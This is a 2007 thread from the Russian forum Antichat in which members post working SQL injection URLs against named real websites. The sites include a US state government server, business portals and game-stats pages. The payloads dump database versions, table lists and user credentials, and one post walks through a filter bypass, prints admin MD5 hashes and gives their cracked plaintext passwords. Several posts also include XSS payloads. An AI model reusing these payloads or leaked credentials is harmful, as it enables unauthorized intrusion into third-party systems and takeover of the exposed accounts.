Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.09.2007, 20:24
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
.mobi
Код:
http://www.webmarket.mobi/wm.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6/*
webmarke_uwebmar@localhost:5.0.41-community-log:webmarke_webmarket
Код:
http://www.webmarket.mobi/wm.php?id=-1+union+select+1,2,concat(column_name,0x3a,table_name,0x3a),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+16001/*
|
|
|
19.09.2007, 21:42
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760
Репутация:
62
|
|
Код:
http://seagullmag.com/article.php?id=-1+union+select+1,0x6865617679206D6574616C21,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11+from+seagullmag_forum.ibf_members+limit+1,1
http://job.dn.ua/classifieds/detail.php?id=382&user_id=-1+union+select+version()&contact=1
http://job.dn.ua/classifieds/user_info.php?user_id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
http://www.myminsk.com/catalog/info.php?id=-1+union+select+1,2,concat_ws(0x3a,table_schema,table_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables
|
|
|
|
20.09.2007, 00:17
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
еще гов))
maps2.nris.mt.gov
Код:
http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=@@version--
http://maps2.nris.mt.gov/Mapper/MapWindow.asp?Profile=-1+or+1=(select+system_user)--
|
|
|
|
20.09.2007, 11:01
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
http://anime.kz/index.html
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,2,3,4,5 ,6,7/*
http://anime.kz/index.html?mode=links&pid=4+union+select+1,table_n ame,3,4,5,6,7+from+INFORMATION_SCHEMA.TABLES/*
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,concat( login,char(58),pwd),3,4,5,6,7+from+user+limit+1,8/*
|
|
|
|
20.09.2007, 15:14
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
www.rusbiz.ru
Ресурс представляет из себя многоотраслевой портал с электронной торговой площадкой. Основной целью портала является содействие компаниям малого и среднего бизнеса в расширении сфер своей деятельности, увеличении объемов продаж, нахождении новых деловых связей за рубежом и проведении бизнес сделок через Интернет. Всё бы хорошо, но... Банальный SQL-Injection в параметре servid.
Получаем список таблиц:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/LIMIT/**/X,1/*&categid=19
Получаем список полей в заданной таблице:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,TABLE_NAME,3,COLUMN_NAME,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME/**/IN/**/('XXX')/**/LIMIT/**/X,1/*&categid=19
* Обратите внимание на использование /**/ вместо стандартных вариантов представления пробела... Это вызвано тем, что фходной параметр фильтруется (хоть и криво). Фильтрация делает невозможным использование %20 или + в качестве пробела, также фильтруется =, поэтому пришлось воспользоваться операцией IN.
Из интересных таблиц имеем USER и forum_user, но форум по техническим причинам отключён, поэтому дело будем иметь только с первой таблицей. Таблица имеет такую структуру: - password - пароль аккаунта в md5
- user_group - группа аккаунта (может быть user, admin и т.д.)
- blocked - активированный аккаунт или нет
- lastlogin - время последнего посещения
Начнём вторжение в святая святых:
http://www.rusbiz.ru/service_description.html?servid=-66'/**/UNION/**/SELECT/**/1,CONCAT_WS(0x3a,login,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/USER/**/WHERE/**/user_group/**/LIKE/**/'%admin%'/**/LIMIT/**/X,1/*&categid=19
По данному запросу возвращается две записи pol и systemuser. Это два админских аккаунта.
Пароли свёрнуты в md5:
pol:890a09778691261d1e1e7c65f6101d3c
systemuser:972c97bdc47dfc8def0e74c55da0bbfd
В помощь Джон и через пару секунд:
pol:51619
systemuser:explore
Ну чтож... Админы никогда не научатся проявлять фантазию при задании паролей от критических ресурсов... Должен заметить, что половина базы снимается одним проходом по словарю и прямым брутом по 0...9 в длине 8 символов.
Не знаю как быстро прикроют эту багу, ибо такое впечатление, что там админ в онлайне... Но в доказательство приведу ещё один аккаунт:
green:1604
|
|
|
|
20.09.2007, 15:23
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.yesmag.ca/bugbeat/bugs.php?id=-8+union+select+1,2,3,4,5,VERSION(),USER()/*
|
|
|
|
20.09.2007, 15:30
|
|
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567
Репутация:
354
|
|
PHP код:
http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'
|
|
|
|
20.09.2007, 17:00
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
cs.xeka.ru
движек - psyhostats
вот скули.. нашел почти сразу но были проблемы с выводом.. потом пошаманил с лимит 0 помогло [:
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19/*'
http://cs.xeka.ru/mafia/map.php?id=2+limit+0+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17/*'
тут еще много ксс, но пару лишь, нашел пока скули искал 
http://cs.xeka.ru/mafia/player.php?id=19%22%3E%3Cscript%3Ealert()%3C/script%3E
http://cs.xeka.ru/mafia/player.php?id=19\%22%3E%3Cscript%3Ealert()%3C/script%3E&weaponid=10&wsort=kills&worder=desc#hitb ox
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,TABLE_SCHEMA,TABL E_NAME,COLUMN_NAME),15,16,17,18,19+from+informatio n_schema.columns/*'
много столбцов)
вывод всякой инфи
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,version(),databas e(),user()),15,16,17,18,19/*'
5.0.45-community-nt-log  s_mafia:root@localhost
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,nickname),15,16,17,18,19+from+amx.amx_amxadmins/*'
1 STEAM_0:1:пароли сказали потереть::belo4ka 1 2% 3 12.00
2 АЙ-ПИ::LeXXXuS 1 2% 3 12.00
3 АЙ-ПИ::Admir@L 1 2% 3 12.00
4 АЙ-ПИ::belo4ka 1 2% 3 12.00
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,level),15,16,17,18,19+from+amx.amx_webadmins/*'
belo4ka:пароли сказали потереть:1
http://cs.xeka.ru/mafia/weapon.php?id=20+limit+0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,concat_ws(0x3A,username,password ,accesslevel),15,16,17,18,19+from+ps_mafia.pstats_ plr_profile/*'
1 :пароли сказали потереть:1 1 2% 3 12.00
2 :пароли сказали потереть:10 1 2% 3 12.00
з.ы. вывод понравился так как там была таблица не надо было тянуть по одной))
з.з.ы движек сегодня увидел первый раз.. мо там есть еще что-то поинтереснее но рыть особо не стал [:
з.з.ы ися был осведомлен)
з.з.ы потер пароли и мыла
Последний раз редактировалось halkfild; 20.09.2007 в 17:12..
|
|
|
|
21.09.2007, 13:58
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
vodnyy.odessa.ua
http://vodnyy.odessa.ua/lists/company.phtml?site=vo&sample_id=-1874+UNION+SELECT+T.L,T.P,'cracked by groundhog',4+FROM+(SELECT+ROWNUM+R,LOGIN+L,PASSWD+ P+FROM+CO_USERS)+T+WHERE+R=X+--+
|
|
|
|
21.09.2007, 20:33
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Код:
http://www.vkus.by/index.php?n=-1+union+select+1,2,3,4,5,6/*
MySQL : 4 версия |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?463782){kind=avatar}
Похожие темы
Линейный вид
